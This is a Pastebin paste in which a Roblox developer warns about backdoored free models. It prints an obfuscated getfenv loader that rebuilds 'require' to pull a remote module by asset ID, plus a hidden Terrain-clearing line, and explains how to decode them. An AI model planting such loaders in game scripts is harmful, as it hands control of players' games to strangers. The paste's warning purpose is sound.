API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 11th, 2019
1,022
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.32 KB | None | 0 0
raw download clone embed print report
  1. --[[
  2.  
  3. First off, I'd like to say that this model is not malicious and is not botted to the front page with no malicious intents at all - you may assume that but there are no scripts at all.
  4.  
  5. -- > Please read down below, this is extremely important for everyone that use models & plugins - any other asset type does **not** have a virus or a 'backdoor' which can grant malicious people access to your game.
  6.  
  7. Recently the Roblox library section has been overtaken by botted models, decals, plugins and even audio. The important part is the models & plugins - they can serve as a malicious intent even if they look/are
  8. disguised as a real model that you'd see in a daily basis of browsing random models.
  9.  
  10. This type of asset can execute something called a virus or mostly known as a backdoor although it cannot break out of your game or studio ( you can't get an actual virus on your PC ); the backdoor can execute
  11. multiple malicious scripts such as teleporters, random marketplace prompts that shows up a tshirt, administrator commands & more which obviously you wouldn't wanna have in your game.
  12.  
  13. To find a backdoor in a model, all you have to look at are the scripts in a front page model, here's an example:
  14.  
  15. https://www.roblox.com/library/3257382329/2M-Sign
  16.  
  17. This sign looks completely legitimate & safe to use however it really isn't - there are a few scripts located in the directory of model. One is safe, the other is malicious.
  18.  
  19. You may be asking to yourself 'Where is it?' or 'I can't see it', well, if we look at a specific script located in the 'Text' part directory and open up the script in 'TextLabel' called 'SetText' you can see some code
  20. which still makes you think that it's 100% legit and safe to use however **it isn't** and it's indented in one of the lines using tab indents; here's an example:
  21.  
  22. game:GetService("Workspace").Terrain:Clear() print("malicious code here!")
  23.  
  24. The malicious code is indented out of your scripting frame so you wouldn't notice it, it's only for that one specific model. For other models it could be disguised as some regular script/module require or located at
  25. the bottom of it.
  26.  
  27. The code is obfuscated, mostly obfuscated with Synapse Xen, Luraph or Ironbrew which are 3 services made for script obfuscation - means you cannot read the source code of what the script really does.
  28.  
  29. However, the script in that model **is not** obfuscated, it uses a function called getfenv which most backdoors use to load in a require module ( a different model that handles the malicious code ); example:
  30.  
  31. getfenv()[string.reverse("\101\114\105\117\113\101\114")](getfenv()["\116\111\110\117\109\98\101\114"](string["\99\104\97\114"](getfenv()["\117\110\112\97\99\107"]{48,88,67,67,52,48,67,69,65,49})))
  32.  
  33. If we dissect it by using loadstring since the numbers after the slashes are something called "loadstrings" we'd get the specified functions for the script - therefore it'd be:
  34.  
  35. print("\101\114\105\117\113\101\114\116\111\110\117\109\98\101\114\99\104\97\114\117\110\112\97\99\107")
  36.  
  37. And then it gives us 4 functions to dissect and get the require module handler for that backdoor which are 'eriuqer, require, tonumber, char, unpack'
  38.  
  39. As soon as you finish deobfuscating the script, you get a table and you unpack it which then gives you a Roblox library asset id with require(); in this case it's 'require(3426799265)'
  40.  
  41. You look up the asset ID and you get the model, open the ModuleScript up and it's all obfuscated with one of the providers I've listed above - you can't really deobfuscate it although you can use programs such as
  42.  
  43. minify made by stravant - https://www.roblox.com/library/197760456/Stravant-Minify-Beautify
  44.  
  45. It doesn't deobfuscate it fully however it does help read the code bits by bits and organize the indents.
  46.  
  47. To prevent your game from having backdoors, please use this safety plugin made by a Developer Forum member on Roblox
  48.  
  49. Link: https://www.roblox.com/library/2670956620/Hidden-Infection-Script-Detector
  50. How to use: https://devforum.roblox.com/t/v2-1-plugin-hidden-backdoor-infection-script-detector-detects-removes-infections-from-malicious-plugins/216692
  51.  
  52. Remember to stay safe and not to have malicious backkdors/viruses in your game
  53.  
  54. ~daniel#0003
  55. F to all the backdoors
  56.  
  57. ']]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!